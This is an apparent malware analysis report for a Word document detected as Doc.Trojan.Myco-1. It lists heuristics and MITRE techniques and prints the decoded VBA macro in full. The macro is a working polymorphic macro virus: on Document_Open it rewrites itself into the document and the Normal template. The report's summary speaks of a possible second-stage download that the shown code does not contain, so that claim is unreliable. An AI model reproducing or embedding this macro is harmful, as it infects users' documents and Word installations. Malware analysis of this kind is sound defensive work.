MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro that is automatically executed by the Document_Open subroutine. This macro is designed to obfuscate and potentially download a second-stage payload, as indicated by the ClamAV detection name 'Doc.Trojan.Myco-1'. The presence of the Document_Open macro and VBA code strongly suggests a malicious document intended for initial compromise via spearphishing.
Heuristics 3
-
ClamAV: Doc.Trojan.Myco-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Myco-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2914 bytes |
SHA-256: 62de67d8cf3d330296c24ccb1a509e0a69fb5d99ece16d83f97b824a793e558b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim A(1 To 9) As String
Dim B(1 To 9) As String
Dim C(1 To 4) As String
Dim D(1 To 6) As String
A(1) = "ActiveDocument"
A(2) = "Word.ActiveDocument"
A(3) = "Application.ActiveDocument"
A(4) = "Word.Application.ActiveDocument"
A(5) = "System.Application.ActiveDocument"
A(6) = "AddIns.Application.ActiveDocument"
A(7) = "Bookmarks.Application.ActiveDocument"
A(8) = "Documents.Application.ActiveDocument"
A(9) = "Word.System.Application.ActiveDocument"
B(1) = "NormalTemplate"
B(2) = "Word.NormalTemplate"
B(3) = "Application.NormalTemplate"
B(4) = "Word.Application.NormalTemplate"
B(5) = "System.Application.NormalTemplate"
B(6) = "AddIns.Application.NormalTemplate"
B(7) = "Bookmarks.Application.NormalTemplate"
B(8) = "Documents.Application.NormalTemplate"
B(9) = "Word.System.Application.NormalTemplate"
C(1) = ".VBProject.VBComponents(1)"
C(2) = ".VBProject.VBComponents.Item(1)"
C(3) = ".VBProject.VBComponents(""ThisDocument"")"
C(4) = ".VBProject.VBComponents.Item(""ThisDocument"")"
D(1) = "MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 33) & vbCrLf & D(1) & vbCrLf & D(2) & vbCrLf & D(3) & vbCrLf & D(4) & vbCrLf & D(5) & vbCrLf & D(6) & vbCrLf & ""End Sub"""
D(2) = A(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.DeleteLines 1, " & A(Int((Rnd * 2) + 1)) & C(Int((Rnd * 2) + 1)) & ".CodeModule.CountOfLines"
D(3) = A(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.AddFromString MyCode"
D(4) = B(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.DeleteLines 1, " & B(Int((Rnd * 2) + 1)) & C(Int((Rnd * 2) + 1)) & ".CodeModule.CountOfLines"
D(5) = B(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.AddFromString MyCode"
D(6) = A(Int((Rnd * 8) + 1)) & ".SaveAs FileName:=" & A(Int((Rnd * 8) + 1)) & ".FullName"
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 33) & vbCrLf & D(1) & vbCrLf & D(2) & vbCrLf & D(3) & vbCrLf & D(4) & vbCrLf & D(5) & vbCrLf & D(6) & vbCrLf & "End Sub"
Application.ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, Word.ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
Documents.Application.ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString MyCode
System.Application.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Word.Application.NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromString MyCode
System.Application.ActiveDocument.SaveAs FileName:=AddIns.Application.ActiveDocument.FullName
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.